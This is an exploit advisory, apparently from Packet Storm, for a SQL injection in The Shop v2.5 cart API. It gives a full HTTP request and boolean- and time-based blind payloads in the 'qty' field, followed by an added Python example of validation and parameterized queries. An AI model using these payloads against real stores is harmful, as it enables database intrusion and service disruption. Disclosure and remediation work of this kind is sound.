
The Shop 2.5 SQL Injection

The Shop version 2.5 suffers from a remote SQL injection vulnerability.

Packet Storm
# Exploit Title: The Shop v2.5 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/the-shop/34858541
# Demo Site: https://shop.activeitzone.com
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /api/v1/carts/add HTTP/1.1
Content-Type: application/json
Accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
Referer: https://localhost
Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
Content-Length: 81
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}

### Parameter & Payloads ###

Parameter: JSON qty ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420) THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495) END))","temp_user_id":null}

    Type: time-based blind
    Title: MySQL > 5.0.12 OR time-based blind (heavy query)
    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR 2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)","temp_user_id":null}
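
An added example, not part of the advisory or the vendor's code: server-side handling of the cart-add body that rejects the request shown above by validating qty and variation_id as bounded integers and binding them as query parameters. The carts table, MAX_QTY, the function names and the use of sqlite3 in place of MySQL are assumptions made for illustration.

```python
import json
import sqlite3

MAX_QTY = 1000  # assumed business limit, not taken from the advisory


class InvalidCartRequest(ValueError):
    """Raised when the cart-add body fails strict validation."""


def parse_positive_int(value, field, upper):
    # Accept an int or a short string of ASCII digits only. bool is rejected
    # explicitly because bool is a subclass of int in Python.
    if isinstance(value, bool):
        raise InvalidCartRequest(f"{field}: not an integer")
    if isinstance(value, str):
        if not (value.isascii() and value.isdigit()) or len(value) > 9:
            raise InvalidCartRequest(f"{field}: not an integer")
        value = int(value)
    if not isinstance(value, int) or not 1 <= value <= upper:
        raise InvalidCartRequest(f"{field}: out of range")
    return value


def add_to_cart(conn, raw_body):
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise InvalidCartRequest("body is not JSON") from exc
    if not isinstance(body, dict):
        raise InvalidCartRequest("body is not an object")
    variation_id = parse_positive_int(body.get("variation_id"), "variation_id", 2**31 - 1)
    qty = parse_positive_int(body.get("qty"), "qty", MAX_QTY)
    # Values are bound as parameters, never concatenated into the SQL text.
    cur = conn.execute(
        "INSERT INTO carts (variation_id, quantity) VALUES (?, ?)",
        (variation_id, qty),
    )
    conn.commit()
    return cur.lastrowid


def demo_db():
    # Hypothetical in-memory schema standing in for the shop's cart table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE carts (id INTEGER PRIMARY KEY, variation_id INTEGER, quantity INTEGER)")
    return conn
```

Validation and parameter binding are independent layers: the type check stops non-numeric qty values at the API boundary, and the bound parameters keep any value that does get through out of the SQL text.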
